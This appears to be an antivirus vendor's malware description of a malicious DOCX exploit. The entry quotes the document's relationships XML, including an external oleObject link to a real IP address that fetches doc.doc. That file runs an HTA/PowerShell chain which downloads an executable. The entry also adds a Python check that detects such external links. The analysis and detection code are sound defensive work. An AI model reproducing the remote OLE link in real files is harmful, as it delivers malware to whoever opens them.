SHA1:
- c85e3179793072b72f885aba702653cec128b16b
An exploit for a Microsoft Word vulnerability, implemented as a Microsoft Word document with the DOCX extension. It contains the following strings:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://***.org/package/2006/relationships">
  <Relationship Id="rId3" Type="http:// ***.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/>
  <Relationship Id="rId7" Type="http:// ***.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/>
  <Relationship Id="rId2" Type="http://***/officeDocument/2006/relationships/settings" Target="settings.xml"/>
  <Relationship Id="rId1" Type="http://***/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId6" Type="http://***/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/>
  <Relationship Id="rId5" Type="http://***/officeDocument/2006/relationships/oleObject" Target="http://144.217.14.173/doc.doc" TargetMode="External"/>
  <Relationship Id="rId4" Type="http://***/officeDocument/2006/relationships/image" Target="media/image1.emf"/>
</Relationships>
Once this document is opened, another file called doc.doc is loaded. It contains an embedded HTA script, detected by Dr.Web as PowerShell.DownLoader.72.
During its execution, PowerShell.DownLoader.72 calls the PowerShell interpreter, which processes another malicious script that downloads an executable file to the attacked computer.
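The distinguishing string above is the oleObject relationship with TargetMode="External", which makes Word fetch doc.doc from a remote host. As an added example (not part of the original description), the following check lists such relationships in every .rels part of a DOCX archive; the function names, the example.invalid namespace and the sample target are constructed placeholders.

```python
import io
import zipfile
import xml.etree.ElementTree as ET


def external_ole_links(docx_bytes):
    """Return (part, Id, Target) for every external oleObject relationship."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # malformed part: skipped here, worth flagging separately
            for el in root.iter():
                # Compare local names so the check does not depend on the namespace URI.
                if el.tag.rsplit("}", 1)[-1] != "Relationship":
                    continue
                if (el.get("Type", "").endswith("/oleObject")
                        and el.get("TargetMode", "").lower() == "external"):
                    hits.append((name, el.get("Id"), el.get("Target")))
    return hits


def build_sample(external):
    """Constructed DOCX-like archive; namespace and target are placeholders."""
    ns = "http://example.invalid/package/2006/relationships"
    base = "http://example.invalid/officeDocument/2006/relationships"
    ole = ('<Relationship Id="rId5" Type="%s/oleObject" '
           'Target="http://example.invalid/doc.doc" TargetMode="External"/>' % base)
    if not external:
        # Benign variant: the OLE object is stored inside the package.
        ole = ('<Relationship Id="rId5" Type="%s/oleObject" '
               'Target="embeddings/oleObject1.bin"/>' % base)
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            '<Relationships xmlns="%s">'
            '<Relationship Id="rId1" Type="%s/styles" Target="styles.xml"/>'
            '%s</Relationships>' % (ns, base, ole))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in external_ole_links(build_sample(external=True)):
        print("external OLE link:", hit)
```

When scanning untrusted samples in bulk, a hardened parser such as defusedxml is a safer substitute for xml.etree.ElementTree.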